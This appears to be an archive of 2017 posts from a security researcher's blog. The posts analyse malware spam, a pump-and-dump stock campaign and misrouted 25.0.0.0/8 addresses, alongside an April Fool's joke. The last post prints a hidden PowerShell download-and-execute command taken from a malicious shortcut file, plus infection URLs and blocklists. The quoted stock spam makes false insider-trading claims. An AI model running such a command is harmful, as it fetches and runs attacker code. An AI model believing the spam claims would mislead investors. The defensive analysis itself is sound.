Sponsored by..

Monday, 3 April 2017

25.0.0.0/8 is not your private network

A recent phishing email originating from an Office 365 caused some confusion.. apparently originating fom an address in the 25.0.0.0.8 range which according to a WHOIS lookup is the UK's Ministry of Defence.

% Abuse contact for '25.0.0.0 - 25.255.255.255' is 'hostmaster@mod.uk'

inetnum:        25.0.0.0 - 25.255.255.255
netname:        UK-MOD-19850128
country:        GB
org:            ORG-DMoD1-RIPE
admin-c:        MN1891-RIPE
tech-c:         MN1891-RIPE
status:         LEGACY
notify:         hostmaster@mod.uk
mnt-by:         UK-MOD-MNT
mnt-domains:    UK-MOD-MNT
mnt-routes:     UK-MOD-MNT
mnt-by:         RIPE-NCC-LEGACY-MNT
created:        2005-08-23T10:27:23Z
last-modified:  2016-04-14T09:56:26Z
source:         RIPE

organisation:   ORG-DMoD1-RIPE
org-name:       UK Ministry of Defence
org-type:       LIR
address:        Not Published
address:        Not Published
address:        Not Published
address:        UNITED KINGDOM
phone:          +44(0)3067700816
e-mail:         mathew.newton643@mod.gov.uk
admin-c:        MN1891-RIPE
abuse-c:        MH12763-RIPE
mnt-ref:        RIPE-NCC-HM-MNT
mnt-ref:        UK-MOD-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         UK-MOD-MNT
created:        2004-04-17T12:18:23Z
last-modified:  2016-10-06T11:09:40Z
source:         RIPE

person:         Mathew Newton
address:        ISS Design Directorate, Joint Forces Command
address:        UK Ministry of Defence
phone:          +44 (0)30 677 00816
e-mail:         mathew.newton643@mod.gov.uk
abuse-mailbox:  hostmaster@mod.uk
notify:         mathew.newton643@mod.gov.uk
nic-hdl:        MN1891-RIPE
created:        2005-03-18T10:42:04Z
last-modified:  2016-12-20T10:33:13Z
source:         RIPE
mnt-by:         UK-MOD-MNT
In this case the connection appeared to come from dm5pr17cu002.internal.outlook.com which does indeed resolve to 25.173.128.134.. which would place it in the MoD's address range. Yes?

Well.. no, because the 25.0.0.0/8 range isn't routable. You can't send traffic to it from the Internet. But it isn't a "private" IP range, it is allocated to the MoD. But it does seem that some companies are taking advantage of this and are using 25.0.0.0/8 for internal networks (much the same as 10.0.0.0/8) when it isn't designed for that.

Of course you can make a DNS record point to anything, it doesn't mean that the server will resolve. A look at all the hosts in 25.173.0.0/16 reveals these apparently active servers:

blserver.net
www.blserver.net
blog.blserver.net
imap.blserver.net
mwhpr13cu002.internal.outlook.com
dm5pr17cu002.internal.outlook.com

25-173-116-219.1334762f6da5400c9f4cbba603d6c121.plex.direct
25-173-129-6.114b489248be4a2489583682ee5d5f3c.plex.direct
sql.engormix.com
has-on.info

In the case of the outlook.com servers the DNS has been misconfigured. What should resolve only PRIVATELY to an 25/8 address is resolving PUBLICALLY to an address in that range. Of course, the servers never respond.And note that this is just one /16, not the whole /8 (reverse DNS for the whole /8 is insane).

The upshot is that the MoD get a lot of abuse calls for bad things that people think originate from their network, but it isn't actually happening.

If you are going to use blocks like 25.0.0.0/8 for internal uses, I would suggest that you take great care not to expose the internal IPs to the outside world. I'm sure the poor people at the MoD would appreciate it.

Friday, 31 March 2017

Leaked documents reveal post-Brexit switch to pre-decimal currency

So with the UK leaving the EU thing kicking off into full swing a lot of interesting stories have been lost in the noise. As expected not only have hard Brexiteers managed to sneak in proposals that we ditch the metric system, it now also seems that they want to ditch decimal currency too.

Madness? Well, they seem to believe that things were better in the old days. Like the 18th Century perhaps. Anyway, these top secret double encoded plans (presuambly leaked by Pro-Bremoaner criminals) have come to light outlining the steps of this particularly mad scheme. It already has a name in government - Dexit.

Basically, immediately after the UK leaves the EU the currency will change back to pounds, shillings and pence...you remember how that works, yes? 12 pence to a shilling, 20 shillings to a pound making 240 pence per pound... on a date pencilled in as being the first day of April in 2019.

All transactions will have to change at that point. However, the pound will still remain the pound including the new pound coin. Notes will still remain the same, although all new ones will contain animal fat by law. As with decimalisation, some coins will remain the same too - the 50p coin will remain valid as 10 shillings, 20p will be 4 shillings and so on for the 10p and 5p coins. New coins will be minted with the new denominations on, but they will circulate alongside the old ones. Copper coins are more of a problem and they will all be withdrawn and replaced.

The halfpenny will not return (thank goodness) and nor will the farthing (1/960th of a pound!). One might argue that the penny could be eliminated altogether as it isn't worth much these days, but apparently there is determination that it will come back.

All eCommerce sites operating in the UK and software will have to be updated to the new currency. It's not as simple as just changing the currency sign, and the law will state that all new computer software will have to support the new currency natively without mucking about with formulas. Formulae. Whatever.

One sticking point is the name of the coins. Technically the current currency is called "new pence", replacing the pre-decimal "old pence". Suggestions for the new coinage include "new old pence", "indedenpence" (clever!) and "Mike Pence".

There will be some exceptions:
  • In anticipation of Scottish independence, the new currency there will be called the "Groat".
  • In Gibraltar the currency will revert to the Euro when it is handed over to Spain (even though 99% of the population don't want that because democracy is so 2016)
  • In Northern Ireland the currency will be determined by whichever side wins the brutal 20-year civil war that follows Brexit.
All of this is quite a low price to pay for taking back control though, isn't it?

(Yes, this was an April Fool's joke, but not too far what what some Brexiters have actually suggested)

Thursday, 30 March 2017

Malware spam: "Re:Payment Remittance Copy"

This fake financial spam leads to malware.


From:    AL HUDA LTD [ap.office@triumftools.sk]
Date:    30 March 2017 at 09:05
Subject:    Re:Payment Remittance Copy
Signed by:    triumftools.sk

Dear Sir,

As instructed by your customer for your payment,

Find attached formal remittance copy received from our bank and contact your  client for payment confirmation. All payment details is in the attached HSBC TT-Copy.

Please Confirm
Best regards,
================================
Alan Bostock
Manager - Finance and Administration
HSBC Exchanger
TEL: (965) 24338094 -620                                  
FAX: (965) 24332815 Mobile: (965) 600-11-868
==================================


Attached is a .GZ archive HSBC TT-Copy.pdf.gz (this assumes you have a program on your Windows PC that can handle .gz files). This contains a malicious executable doc9876543234500001.exe which currently has a VirusTotal detection rate of 32/60.

Analysis of the binary is pending. You can be certain that it is nothing good.

Monday, 20 March 2017

More highly personalised malspam using hijacked domains

Following on from this spam some weeks ago, another one comes in using a broadly similar technique of including the potential victim's real home address while using apparently hijacked infrastructure (although in this case the hijacking isn't so elaborate).

From: customerservice@newshocks.com [mailto:customerservice@newshocks.com]
Sent: 15 March 2017 18:23
Subject: [Redacted] Your order 003009 details




Hello [redacted],
We are delighted to confirm details of your recent order 003009. We will email you again as soon as the items you have chosen are on their way to you.
If you have an online account with us, you can log in here to see the current status of your order.
You will receive another e-mail from us when we have despatched your order.
Information on order 003009 status here
All prices include VAT at the current rate. A full VAT receipt will be included with your order.
Delivery Address:

[Name and address redacted]

If you have any questions, or something about your order isn't right, please contact us. Or you can simply reply to this e-mail.
Best regards and many thanks,

Contact Us Opening Times Delivery Options Returns Policy Privacy Policy Terms & Conditions


The newshocks.com domain used in the "From" field matches the sending server of rel209.newshocks.com (also mail.newshocks.com) on 185.141.164.209. This appears to be a legitimate but unused domain belonging to a distributor of car parts.

The link in the email goes to clipartwin.com/customers/customer-status-003009-verified which is currently 404ing so I can't tell what the payload is, although the previous payload appears to be Ramnit or similar. This is using another hijacked but apparently legitimate web server.

I don't know where the data has leaked from, but in this case the victim had lived at the address for the past four years.. so the leak cannot be ancient. If you have seen something similar or have an idea of where the data came from, please leave a comment below.


Pump and dump spam: Incapta Inc (INCT)

It's been a long time since I've seen a pump-and-dump spam run illegally pushing a stock as hard as this:

From:
To:
Date:    20 March 2017 at 09:30
Subject:    This stock is about to receive a buy out at 10 times its current market price...

Dear Subscriber,

It's been a long time since I sent you my special newsletter containing a hot stock tip.
The reason for that is because I really haven't had many opportunities to present to you.

Incapta Inc (ticker: INCT) is a company that was brought to my attention earlier this morning
by one of my colleagues at an M&A firm in manhattan.

It seems that a buy out from DJI is imminent at $1.37 per share and is set to be announced
next week on Tuesday, March 28.

INCT is a company that has revolutionized the drone industry by creating the first independent drones
that can be dispatched to areas of interest such as crime scenes, car chases, wild fires, etc.

The network of drones operates by connecting to a cloud and complex algorithms efficiently dispatch the drones
within moments of an incident being reported.

This way the media outlet that owns the drones can be the first to the scene and get exclusive, live-streamed.

This has the potential to literally change the world of news broadcasting as we know it and DJI
(the most prominent drone-maker in the world) sees the potential of this technology which is why
they are willing to pay $1.37 a share to acquire it. A premium of over 1,000% over Friday's closing price.

Tell all your friends about INCT and make sure you buy it as soon as possible today at any price under
20 cents a share to guarantee yourself massive profits.
This company has millions of dollars worth of expenditure and almost zero income [source].


Towards the end of 2015, the stock was valued at $31,350 a share (!) but is now worth about 13 cents [source].

The spam is being sent from a botnet to random addresses. I have no evidence to suggest that Incapta Inc is behind this, but this commentary at InvestorsHub is not flattering.

Pump and dump spam like this is a criminal activity, and typically companies being promoted in this way are in terminal decline (but not always). Avoid buying stocks on the recommendation of criminals.

[UPDATE] This company has some form, previously it was known as GameZnFlix and then TBC Global News Network.

UPDATE 1

A second version of the spam is going around..

From:
To:
Date:    20 March 2017 at 17:11
Subject:    You can make 10x on your money by next week if you buy this stock now.

Dear Subscriber,

Do you remember the last time I sent you a tip about a company worth buying in the market?

I was right on point as its shares shot up more than tenfold in under 7 days.
I had privileged information and I knew that something big was brewing.

It took me months to find the next stock that is somewhat similar to that last one I told you about,
but you can be certain that the upside potential is just as good.

Incapta Incorporated [symbol: INCT] is a company that is on the verge of being acquired by a large drone-maker competitor.

On March 28th (yes, next week) there is going to be something special announced that will take the share price from under 0.20 to over a dollar, overnight.

INCT specializes in the manufacturing of high-end specialized drones with real-world applications such as automated dispatching for news coverage by companies like CNN all the way to miniature drones which can be used to gather intelligence for the military, private investigators and police.

This cutting edge technology is changing the world as we know it, and INCT is at the forefront of it all which is why it’s being acquired and its share price is about to go ballistic.

Tell everyone you know to buy INCT right now and keep it on the low as much as possible.
UPDATE 2

Third version..

From:
To:
Date:    21 March 2017 at 07:17
Subject:    Find out now why this company is going up tenfold by this time next week.

Dear profit seeker,

It’s been quite some time since I sent you information about a stock worth buying, but the last time I did the shares soared more than 15x.

This means that if you had put in just a grand you would have gotten 15k out of it when all is said and done.

Even if you only get 2 or 3 tips from me per year, all of them are guaranteed winners because I base my recommendations on knowing privileged information.

I don’t want you to miss out again so keep on reading to find out which company is going up 1,000% by this time next Tuesday.

Incapta Inc [tickersymbol: INCT] is about to be entirely acquired by an enormous multibillion dollar corporation.

On the 28 of March you can expect to see a public announcement made which will outline the details of this acquisition with the most important detail being the price at somewhere around $1.40

This means if you buy and hold INCT right now you’ll have a guaranteed profit of a thousand percent.

INCT is a company which has built “cloud droning”. That’s basically the ability for drones to have their own mind as they connect to a network of artificial intelligence and work with each other autonomously.

It is for example possible to set up a feature to dispatch them whenever there is a car accident somewhere in order to be the first on the scene. There are also endless military applications for these drones as the company has been in talks with the US Army for months already.

Please keep this information to yourself, don’t tell your friends or family to buy the stock now. This is exclusive to my subscribers only.

Cheers.
UPDATE 3

Another variant. Incidentally, this appears to originate from the Necurs Botnet which has also pushed Locky and Dridex in the past.

From:
To:
Date:    21 March 2017 at 14:06
Subject:    Here is your chance to buy shares that will go up 10x by next week.

To all my subscribers,

As you obviously know, I have been quiet these last couple of months because I really have not had a stock worth recommending for purchase.

After the last stock’s 1,500% gains I really want to make sure that whatever I tell you to buy next will be a big winner since your expectations are high.

Today I want you to keep an eye on INCT (incapta inc) because something really huge is about to happen next week.

One of the gents I work with back in New York told me that INCT is on the verge of signing a deal to sell the company to a large multinational and this deal should be announced on Tuesday or Wednesday of next week and will carry a price per share of $1.38

I guess their special drone technology is too good to ignore, and a massive player wants to acquire all their know-how, IP and manufacturing capabilities.

That being said, this is a very rare opportunity to get in before the deal is officially announced and make a quick 10x on your principal in just 7 days.

Keep this on the low but do act quickly if you want to buy in. I recommend an entry point of 17 cents or under to maximize the upside.

All the best.

UPDATE 4

Another variant. The last time I looked, this spam run had persuaded people to buy more than six million shares in this company, which in my personal opinion appear to be worthless. There are only around 100 million shares, so this seems like a fair chunk.

From:
To:
Date:    22 March 2017 at 08:08
Subject:    This public company is being bought out. Read now to profit from it.

Dear valued member,

It has been a very long time since I emailed you about a rare investment opportunity.

You signed up to my newsletter because you were seeking to only invest in companies which I can guarantee will go up and I only email you when I know one will.

The last stock I told you to buy went up about 1000% and this next one is guaranteed a solid 1300% keep on reading to find out why.

INCT (incapta inc) is a drone-maker with proprietary algorithms which essentially bring drones to life. These algorithms give the drones the capability to act independent of a physical operator.

Because of they own this amazing technology which they developed in house, they have been receiving huge attention from the US Army as well as several private firms including DJI and Amazon.

A guy I work with at a mergers and acquisition firm in New York told me that INCT is about to be bought out for $1.37 per share on Tuesday or Wednesday of next week. He has always come through for me.

While INCT may currently seem stagnant, that’s because very few people know about this imminent deal so don't let that fool you.

I don't expect the stock price to swing much in either direction until the takeover is announced next week, at which point it will shoot up to around $1.37 overnight.

You know what to do if you want to profit when this happens.

Keep it on the hush, but do act quickly.

Best Regards,
Viola Haney

UPDATE 5

Another variant. So far over 12 million shares have been traded although the stock price has slumped 47% since yesterday. This is over 10% of the company that has been traded, bringing in around $140,000 for whoever holds them (and in my opinion the shares are worth nothing at all).

From:   
To:
Date:    22 March 2017 at 16:00
Subject:    Read Now: Why this company’s shares are guaranteed to soar next week.

Howdy,

We haven't communicated in a while and you might be wondering why I'm emailing you now out of the blue but it's because I have something very special to share with you.

Remember this last company I told you to buy a few months ago? It jumped around 1000% in like two weeks if you recall.

I've got another one of those to share with you today and you could make some serious profits with it if you buy it now.

INCT (incapta inc) is a high technology company that's got some very special and unique drone systems. In fact, their stuff in so interesting that even the United States government has taken notice of it.
Anyway I won't bore you with the details, so the reason why I am telling you about INCT is because a buy out is imminent.
A gentleman I've known for almost a decade now who works out of an m&a company in manhattan told me that on March 28 INCT will be bought out by a large corporation at a price of $1.38 a share.

The stock is down today (these things happen), but it's absolutely meaningless and shouldn't scare you in any way, shape or form because once the buy out is announced, this stock is going to shoot up to 1.38 in a matter of minutes which is essentially guaranteed gains of about 1400% from current prices.

The stock is down because some investors are selling. It must be that they haven't heard the news, and they will be feeling very stupid next week when the announcement is made public.

Keep this on the low and feel free to buy as many shares as you possibly can right now.

Take care,
Vivian Rogers

UPDATE 6

12.7 million shares have now been traded, out of 100 million shares in total. Who actually holds this much stock in Incapta, Inc? According to SEC filings.. one person. Amusingly, the spammers forgot to mention the actual stock they were pushing..

From:
To:
Date:    23 March 2017 at 08:07
Subject:    I've got strong reasons to believe that this stock is about to soar.

Alright, let's get right to it...

We've been out of touch for a while. I've been very busy looking for the next big stock that has the potential to explode and it took me months to find one.

If I can be honest, this one came to me as a god send. I got lucky. I have this friend who works at a law firm in NYC and we've known each other for a very long time.

Long story short, he told me that his firm is about to finalize a big takeover by a multibillion corporation. They're buying this tiny company that is now trading at just around 10 cents a share.

I couldn't believe my ears when I heard him say that they're paying somewhere between $1.30 and $1.39 for the company. The deal is closing and being announced mid next week.

I could get into what the company does, but who really cares right? All we need to know is that they are in the high tech industry and that this is going to be a huge buyout.

I recommend you buy shares as soon as possible today and wait it out until you get paid over $1.30 next week. The way takeovers work is that they will just credit this price per share, in cash, to your brokerage account and in exchange will take the shares that you bought at just pennies.

I may never have another tip like this, so cash in on it while you still can.
UPDATE 7

Another version pushing this (in my personal opinion) worthless stock. So far about 15 million of the apparently 100 million shares in this company have been traded, bringing SOMEBODY in more that $1.5m in cash. The profit they are getting depends on how much they paid of course.

From:
To:
Date:    24 March 2017 at 06:53
Subject:    Allow me to share something profitable with you today.

If you're wondering why I'm emailing you now, out of the blue, after months of radio silence let me tell you that I have a good reason for that.

Do you remember the last time I sent you a tip? It was around November if I recall correctly.

If you bought that stock I told you about back then, you would've quadrupled your money at the very least.

Now here we are, a few months later and I've got something else to tell you about.

Basically if you remember, I've got a good acquaintance who works at a law firm in New York and when I took him out to a fancy steak dinner last Monday (with lots of wine) he became very talkative and let me in on a little tip.

This is what I want to share with you today. He essentially told me that some time mid next week, a small company called incapta (ticker: INCT) is going to announce that it's being acquired by a giant for a little over 1.30 a share (yes over a dollar thirty, and yes it's at just under 15 cents now)

He knows this because his law firm is the one that drafted all the paperwork for the deal and they are expected to finalize and sign the agreements today, with the official announcement coming some time between Tuesday and Thursday.

If you buy shares today, you are guaranteed to make approximately tenfold next week. The way it works is if you're holding the shares they will just take them out of your account automatically and credit you with the cash equivalent to 1.37 or so which you can take out whenever you want and spend on nice things.

Keep me in mind when you're rolling in it. I expect a big thank you and maybe a small gift!
UPDATE 8

InCapta's CEO, John Fleming, issued a statement denying that the firm had anything to do with this "newsletter" (actually a massive, illegal spam run)

SAN DIEGO, CA / ACCESSWIRE / March 23, 2017 / InCapta, Inc. (OTC PINK: INCT) announced today that it has been made aware of and requested by the OTC Markets Group, Inc. to comment on recent trading and promotional activity concerning INCT common stock.

On March 22, 2017, OTC Markets informed the Company that it became aware of certain promotional activities concerning InCapta and its common stock. OTC Markets informed the company that it had received copies of promotional newsletter emails encouraging investors to purchase the Company's common stock. The Company has been informed that this promotional activity coincided with higher than average trading volume in the Company's stock. The Company was unaware of the promotional activity until informed by OTC Markets and is unaware of the full nature and content of this promotional activity, the responsible parties, and the extent of the email newsletters' dissemination.

InCapta states definitively that the Company, its officers, directors and, to the Company's knowledge, its controlling shareholders (i.e., shareholders owning 10% or more of the Company's securities) have not, directly or indirectly, authorized or been involved in any way (including payment to a third-party) with the creation or distribution of promotional materials including these email newsletters; and that the Company, its officers, directors and, to the knowledge of the Company, any controlling shareholders, have not sold or purchased the Company's securities within the past 30 days other than as specified below.

"The Company is not aware of the promotional materials' author or its affiliated entities or persons. The Company's recent press releases have reported on and provided disclosure of legitimate and ongoing corporate activity only, and are not part of any promotional activities or campaign," stated John Fleming, CEO of InCapta. The Company encourages those interested in the Company to rely solely on information included in its press releases combined with its filings and disclosures made with OTCMarkets Group. The Caveat Emptor warning is mandated for 30 days, wherein a review by OTCMarkets shall take place to decide on its removal. The Company is determined to take appropriate measures in this time to satisfy, without delay, any and all concerns which brought on the label. We thank OTCMarkets for their openness and consideration to the investors of InCapta.

About InCapta, Inc.
InCapta, Inc., formerly known as TBC Global News Network, Inc., is a media holding company, which works with clients to develop, operate, and market online cloud Television networks and other entertainment projects. The Company participates in various fields of online business models by providing executive level managerial assistance as well as arranging for clients online presence through social media.

[Legalese snipped for readability]

CONTACT
John Fleming
InCapta, Inc.
Tel: (619) 798-9284
hxxp://www.incapta.com
SOURCE: InCapta, Inc.





Wednesday, 15 February 2017

Malware spam: "RBC - Secure Message" / service@rbc-secure-message.com

This fake banking email leads to some sort of malware:



From:    RBC - Royal Bank [service@rbc-secure-message.com]
Date:    15 February 2017 at 17:50
Subject:    RBC - Secure Message
Signed by:    rbc-secure-message.com


Secure Message Secure Icon
This is an automated message send by Royal Bank Secure Messaging Server. To ensure both you and the RBC Royal Bank comply with current legislation, this message has been encrypted. Please check attached documents for more information.

Note: You should not store confidential information unless it is encrypted.
CONFIDENTIALITY NOTICE:The contents of this email message and any attachments are intended solely for the addressee(s)and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments. If you are not the recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.


RBCSecureMessage.doc
44K



Attached is a file RBCSecureMessage.doc which contains some sort of macro-based malware. It displays the following page to entice victims to disable their security settings.



Automated analysis is inconclusive [1] [2].  The domain rbc-secure-message.com is fake and has been registered solely for this purpose of malware distribution. In all the samples I saw, the sending IP was 64.91.248.146 (Liquidweb, US) but it does look like all these IPs in the neighbourhood are involved in the same activity:

64.91.248.137
64.91.248.146
64.91.248.148
64.91.248.150

I recommend you block 64.91.248.128/27 at your email gateway to be sure.





Highly personalised malspam making extensive use of hijacked domains

This spam email contained not only the intended victim's name, but also their home address and an apparently valid mobile telephone number:

Sent: 14 February 2017 13:52
To: [redacted]
From: <customer@localpoolrepair.com>
Subject: Mr [Redacted] Your order G29804772-064 confirmation


Dear Mr [redacted],

Thank you for placing an order with us.

For your reference your order number is G29804772-064.

Please note this is an automated email. Please do not reply to this email.

Get your order G29804772-064 details

Your order has been placed and items in stock will be sent to the address shown below. Please check all the details of the order to ensure they are correct as we will be unable to make changes once the order has been processed. You will have been notified at the point of order if an item is out of stock already with expected delivery date.

Delivery Address
[address redacted]
[telephone number redacted]

Delivery Method:
Standard Delivery


Your Order Information
Prices include VAT at 20%


Customer Service Feedback
We are always working to improve the products and service we provide to our customers - we do this through a continual review of the product range, and ongoing training of our Customer Service Team. We continually strive to improve our levels of service and we welcome feedback from our customers regarding your buying experience and the product you receive.

Feefo Independent Reviews
21 days after your purchase, you will receive an email from the independent feedback company Feefo. It takes less than a minute to complete and we'd really appreciate your feedback!


IMPORTANT INFORMATION ABOUT YOUR ORDER

Delivery

Order Tracking
Once your order has left our warehouse we will email you to confirm that the items have been shipped and include tracking details of the parcel so that you may track delivery progress directly with our courier company.

Stock Availability
On very rare occasions not every item will be available when we come to pack and despatch your order. If this is the case you will receive an email from us letting you know which items are affected and an expected delivery time.

Product Returns
All items purchased are covered by our customer friendly returns policy. Please visit for full details.
Thank you for placing your order with us. We really appreciate your custom and will do everything within our power to ensure you get the very best of service.

The data in the spam was identifiable as being a few years old. The intended victim does not appear on the haveibeenpwned.com database. My assumption is that this information has been harvested from an undisclosed data breach.

I was not able to extract the final payload, however the infection path is as follows:

http://bebracelet.com/customerarea/notification-processing-G29804772-064.doc
--> http://customer.abudusolicitors.com/customerarea/notification-processing-G29804772-064.doc
--> https://customer.affiliate-labs.net/customerarea/notification-processing-G29804772-064.zip

This ZIP file actually contains a .lnk file with the following Powershell command embedded in it:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -nologo -c IEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));

I couldn't get a response from the server at cristianinho.com [5.152.199.228 - Redstation, UK], this looks like a possibly legitimate but hijacked domain that uses nameservers belonging to Namecheap. But that's not the only Namecheap connection, because the two "customer" subdomains are also using Namecheap hosting (for the record the subdomains are hosted on - 185.130.207.37 and 185.141.165.204 which is Host1Plus, UK / Digital Energy Technologies, DE).

Three connection to Namecheap is worrying, and certainly we've seen hijacking patterns involving other domain registrars. Or it could just be a coincidence..

The email originated from mx119.argozelo.info on 188.214.88.119 (Hzone, Romania). Just on a hunch, I checked the domain argozelo.info and it appears to be a wholly legitimate site about a Portuguese village, registered at GoDaddy hosted on Blogger. So why does it need a dedicated mail server?

Well.. this particular rabbit hole goes a little deeper. mx119 gives a clue that there might be more than one mailsever, and indeed there are 34 of the critters name mx110.argozelo.info through to mx143.argozelo.info hosted on 188.214.88.110 through 188.214.88.142. But according to Wikipedia, Argozelo only has about 700 inhabitants, so it seems unlikely that they'd need 34 mailservers in Romania.

So, my guess is that argozelo.info has also been hijacked, and hostnames set up for each of the mailservers. But we're not quite finished with this rabbit hole yet. Oh no.

What caught my eye was a mailserver on 188.214.88.110 (the same as mx110.argozelo.info) named mail.localpoolrepair.com which certainly rang a bell because the email was apparently from customer@localpoolrepair.com - yeah, OK.. the "From" in an email can be anything but this can't be a coincidence.

localpoolrepair.com appears to be a legitimate but unused GoDaddy-registered domain, hosted at an Athenix facility in the US. So why is there a mailserver in a Romanian IP block? A DIG at the records for this domain are revealing:

 Query for localpoolrepair.com type=255 class=1
  localpoolrepair.com SOA (Zone of Authority)
        Primary NS: dns.site5.com
        Responsible person: hostmaster@site5.com
        serial:2017021207
        refresh:3600s (60 minutes)
        retry:3600s (60 minutes)
        expire:604800s (7 days)
        minimum-ttl:3600s (60 minutes)
  localpoolrepair.com A (Address) 143.95.232.95
  localpoolrepair.com MX (Mail Exchanger) Priority: 10 mail.localpoolrepair.com
  localpoolrepair.com NS (Nameserver) dns2.site5.com
  localpoolrepair.com NS (Nameserver) dns.site5.com
  localpoolrepair.com TXT (Text Field)
    v=spf1 ip4:188.214.88.110/31 ip4:188.214.88.112/28 ip4:188.214.88.128/29 ip4:188.214.88.136/30 ip4:188.214.88.140/31 ip4:188.214.88.142/32  ~all
So.. the SPF records are valid for sending servers in the 188.214.88.110 through 188.214.88.142 range. It looks to me as if localpoolrepair.com has been hijacked and these SPF records added to it.

So we have hijacked legitimate domains with presumably a neutral or good reputation, and we have valid SPF records. This means that the spam will have decent deliverability. And then the spam itself addresses the victim by name and has personal details presumably stolen in a data breach. Could you trust yourself not to click the link?

Recommended blocklist (email)
188.214.88.0/24

Recommended blocklist (web)
5.152.199.228
185.130.207.37
185.141.165.204